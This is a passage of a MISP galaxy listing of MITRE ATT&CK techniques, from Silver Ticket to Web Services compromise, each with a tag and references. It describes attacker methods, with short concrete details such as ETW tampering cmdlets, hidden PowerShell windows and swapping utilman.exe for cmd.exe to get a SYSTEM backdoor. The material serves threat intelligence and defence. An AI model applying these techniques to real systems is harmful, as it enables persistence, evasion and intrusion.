Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)

Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).

The tag is: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002"

Table 3770. Table References
Links
https://attack.mitre.org/techniques/T1558/002
https://adsecurity.org/?p=2011
https://adsecurity.org/?p=1515
https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

Vulnerability Scanning - T1595.002

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002"

Table 3771. Table References
Links
https://attack.mitre.org/techniques/T1595/002
https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning

Indicator Blocking - T1562.006

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006"

Table 3772. Table References
Links
https://attack.mitre.org/techniques/T1562/006
https://capec.mitre.org/data/definitions/571.html
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A
https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events
https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

Spearphishing Link - T1566.002

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"

Table 3773. Table References
Links
https://attack.mitre.org/techniques/T1566/002
https://capec.mitre.org/data/definitions/163.html
https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Email Accounts - T1586.002

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).

A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

The tag is: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002"

Table 3774. Table References
Links
https://attack.mitre.org/techniques/T1586/002
https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

Service Execution - T1569.002

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002"

Table 3775. Table References
Links
https://attack.mitre.org/techniques/T1569/002
https://docs.microsoft.com/windows/win32/services/service-control-manager
https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Email Addresses - T1589.002

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002"

Table 3776. Table References
Links
https://attack.mitre.org/techniques/T1589/002
https://www.hackers-arise.com/email-scraping-and-maltego
https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

Spearphishing Attachment - T1598.002

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1598.002"

Table 3777. Table References
Links
https://attack.mitre.org/techniques/T1598/002
https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
https://github.com/ryhanson/phishery
https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Windows Service - T1543.003

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.

An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).

The tag is: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"

Table 3778. Table References
Links
https://attack.mitre.org/techniques/T1543/003
https://capec.mitre.org/data/definitions/478.html
https://capec.mitre.org/data/definitions/550.html
https://capec.mitre.org/data/definitions/551.html
https://technet.microsoft.com/en-us/library/cc772408.aspx
https://technet.microsoft.com/en-us/sysinternals/bb963902
https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697
https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

Launch Daemon - T1543.004

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)

Adversaries may install a Launch Daemon configured to execute at startup by using the <code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)

Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as <code>usr/local/bin</code> to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon’s plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004"

Table 3779. Table References
Links
https://attack.mitre.org/techniques/T1543/004
https://capec.mitre.org/data/definitions/550.html
https://capec.mitre.org/data/definitions/551.html
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://www.real-world-systems.com/docs/launchdPlist.1.html
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
https://bradleyjkemp.dev/post/launchdaemon-hijacking/
https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Hidden Window - T1564.003

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.

On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)

Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock.

Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"

Table 3780. Table References
Links
https://attack.mitre.org/techniques/T1564/003
https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

Time Providers - T1547.003

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003"

Table 3781. Table References
Links
https://attack.mitre.org/techniques/T1547/003
https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top
https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
https://github.com/scottlundgren/w32time
https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings
https://technet.microsoft.com/en-us/sysinternals/bb963902

DNS Calculation - T1568.003

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)

One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Calculation - T1568.003"

Table 3782. Table References
Links
https://attack.mitre.org/techniques/T1568/003
http://www.crowdstrike.com/blog/whois-numbered-panda/
https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html
https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

Web Services - T1583.006

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006"

Table 3783. Table References
Links
https://attack.mitre.org/techniques/T1583/006
https://threatconnect.com/blog/infrastructure-research-hunting/

Digital Certificates - T1596.003

Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.

Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1596.003"

Table 3784. Table References
Links
https://attack.mitre.org/techniques/T1596/003
https://www.sslshopper.com/ssl-checker.html
https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2

Digital Certificates - T1587.003

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).

After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003"

Table 3785. Table References
Links
https://attack.mitre.org/techniques/T1587/003
https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Employee Names - T1589.003

Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003"

Table 3786. Table References
Links
https://attack.mitre.org/techniques/T1589/003
https://www.opm.gov/cybersecurity/cybersecurity-incidents/

Spearphishing Link - T1598.003

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003"

Table 3787. Table References
Links
https://attack.mitre.org/techniques/T1598/003
https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html
https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages
https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Dylib Hijacking - T1574.004

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application’s address space allowing the malicious dylib to inherit the application’s privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)

The tag is: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1574.004"

Table 3788. Table References
Links
https://attack.mitre.org/techniques/T1574/004
https://capec.mitre.org/data/definitions/471.html
https://objective-see.com/blog/blog_0x46.html
https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf
https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py
https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
https://taomm.org/vol1/pdfs.html
https://malwareunicorn.org/workshops/macos_dylib_injection.html#5
https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html

LC_LOAD_DYLIB Addition - T1546.006

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)

The tag is: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006"

Table 3789. Table References
Links
https://attack.mitre.org/techniques/T1546/006
https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

VBA Stomping - T1564.007

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)

An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)

The tag is: misp-galaxy:mitre-attack-pattern="VBA Stomping - T1564.007"

Table 3790. Table References
Links
https://attack.mitre.org/techniques/T1564/007
https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html
https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/
https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239
https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278
https://github.com/bontchev/pcodedmp
https://github.com/decalage2/oletools

Accessibility Features - T1546.008

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
Narrator: <code>C:\Windows\System32\Narrator.exe</code>
Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008"

Table 3791. Table References
Links
https://attack.mitre.org/techniques/T1546/008
https://capec.mitre.org/data/definitions/558.html
https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/
https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

Web Services - T1584.006

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1584.006"

Table 3792. Table References
Links
https://attack.mitre.org/techniques/T1584/006
https://www.recordedfuture.com/turla-apt-infrastructure/
https://threatconnect.com/blog/infrastructure-research-hunting/

AppCert DLLs - T1546.009

